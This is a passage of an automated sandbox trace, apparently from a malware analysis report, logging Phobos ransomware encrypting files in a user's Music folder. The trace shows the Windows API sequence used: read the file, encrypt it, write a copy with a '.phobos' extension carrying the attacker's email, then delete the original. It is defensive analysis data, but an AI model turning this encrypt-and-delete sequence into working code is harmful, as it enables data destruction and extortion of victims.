CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa329e8) returned 1 [0198.587] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.587] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0198.587] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.587] WriteFile (in: hFile=0x118, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0198.587] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.587] CloseHandle (hObject=0x140) returned 1 [0198.591] CloseHandle (hObject=0x118) returned 1 [0198.591] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\Gl4LuTbe9Nis6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\gl4lutbe9nis6.wav")) returned 1 [0198.593] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\uHWJ0s2ka9l8vhODIdx.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\uhwj0s2ka9l8vhodidx.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.624] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=15674) returned 1 [0198.624] CloseHandle (hObject=0x16c) returned 1 [0198.624] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\uHWJ0s2ka9l8vhODIdx.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\uhwj0s2ka9l8vhodidx.m4a")) returned 0x20 [0198.625] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\uHWJ0s2ka9l8vhODIdx.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\uhwj0s2ka9l8vhodidx.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\uHWJ0s2ka9l8vhODIdx.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\uhwj0s2ka9l8vhodidx.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.625] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.625] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\uHWJ0s2ka9l8vhODIdx.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\uhwj0s2ka9l8vhodidx.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.626] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32b68) returned 1 [0198.626] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.626] ReadFile (in: hFile=0x16c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3d3a, lpOverlapped=0x0) returned 1 [0198.627] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3d40, dwBufLen=0x3d40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3d40) returned 1 [0198.627] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3d40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3d40, lpOverlapped=0x0) returned 1 [0198.629] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0198.629] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.629] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0198.629] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.629] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0198.629] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.629] CloseHandle (hObject=0x16c) returned 1 [0198.629] CloseHandle (hObject=0x178) returned 1 [0198.629] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\uHWJ0s2ka9l8vhODIdx.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\uhwj0s2ka9l8vhodidx.m4a")) returned 1 [0198.630] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\Ez5862N_Yk_6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\ez5862n_yk_6.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.631] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=3565) returned 1 [0198.631] CloseHandle (hObject=0x178) returned 1 [0198.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\Ez5862N_Yk_6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\ez5862n_yk_6.wav")) returned 0x20 [0198.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\Ez5862N_Yk_6.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\ez5862n_yk_6.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\Ez5862N_Yk_6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\ez5862n_yk_6.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.631] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.631] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\Ez5862N_Yk_6.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\ez5862n_yk_6.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.632] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32b68) returned 1 [0198.632] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.632] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xded, lpOverlapped=0x0) returned 1 [0198.633] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xdf0, dwBufLen=0xdf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xdf0) returned 1 [0198.633] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xdf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xdf0, lpOverlapped=0x0) returned 1 [0198.634] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0198.634] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.634] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0198.634] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.634] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0198.634] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.634] CloseHandle (hObject=0x178) returned 1 [0198.634] CloseHandle (hObject=0x16c) returned 1 [0198.635] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\Ez5862N_Yk_6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\ez5862n_yk_6.wav")) returned 1 [0198.635] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\hGEJFBQ5CVg6k9aNnlpY.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\hgejfbq5cvg6k9annlpy.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.636] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=59429) returned 1 [0198.636] CloseHandle (hObject=0x16c) returned 1 [0198.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\hGEJFBQ5CVg6k9aNnlpY.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\hgejfbq5cvg6k9annlpy.mp3")) returned 0x20 [0198.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\hGEJFBQ5CVg6k9aNnlpY.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\hgejfbq5cvg6k9annlpy.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\hGEJFBQ5CVg6k9aNnlpY.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\hgejfbq5cvg6k9annlpy.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.636] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.636] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\hGEJFBQ5CVg6k9aNnlpY.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\hgejfbq5cvg6k9annlpy.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.637] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32b68) returned 1 [0198.637] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.637] ReadFile (in: hFile=0x16c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe825, lpOverlapped=0x0) returned 1 [0198.639] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe830, dwBufLen=0xe830 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe830) returned 1 [0198.639] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe830, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe830, lpOverlapped=0x0) returned 1 [0198.641] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0198.641] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.641] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0198.641] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.641] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0198.641] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.641] CloseHandle (hObject=0x16c) returned 1 [0198.641] CloseHandle (hObject=0x178) returned 1 [0198.641] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\hGEJFBQ5CVg6k9aNnlpY.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\hgejfbq5cvg6k9annlpy.mp3")) returned 1 [0198.642] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\HrIKXMx9SS8KCsxoOA.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\hrikxmx9ss8kcsxooa.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.643] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=47894) returned 1 [0198.643] CloseHandle (hObject=0x178) returned 1 [0198.643] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\HrIKXMx9SS8KCsxoOA.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\hrikxmx9ss8kcsxooa.m4a")) returned 0x20 [0198.643] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\HrIKXMx9SS8KCsxoOA.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\hrikxmx9ss8kcsxooa.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.643] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\HrIKXMx9SS8KCsxoOA.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\hrikxmx9ss8kcsxooa.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.643] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.643] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.643] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\HrIKXMx9SS8KCsxoOA.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\hrikxmx9ss8kcsxooa.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.644] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32b68) returned 1 [0198.644] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.644] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xbb16, lpOverlapped=0x0) returned 1 [0198.645] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xbb20, dwBufLen=0xbb20 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xbb20) returned 1 [0198.646] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xbb20, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xbb20, lpOverlapped=0x0) returned 1 [0198.647] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0198.647] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.647] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0198.647] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.647] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0198.647] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.647] CloseHandle (hObject=0x178) returned 1 [0198.647] CloseHandle (hObject=0x16c) returned 1 [0198.647] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\HrIKXMx9SS8KCsxoOA.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\hrikxmx9ss8kcsxooa.m4a")) returned 1 [0198.648] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\s_BQB.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\s_bqb.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.649] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=10392) returned 1 [0198.649] CloseHandle (hObject=0x16c) returned 1 [0198.649] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\s_BQB.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\s_bqb.m4a")) returned 0x20 [0198.649] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\s_BQB.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\s_bqb.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\s_BQB.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\s_bqb.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.649] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.649] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\s_BQB.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\s_bqb.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.650] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32b68) returned 1 [0198.650] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.650] ReadFile (in: hFile=0x16c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2898, lpOverlapped=0x0) returned 1 [0198.651] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x28a0, dwBufLen=0x28a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x28a0) returned 1 [0198.651] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x28a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x28a0, lpOverlapped=0x0) returned 1 [0198.652] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: 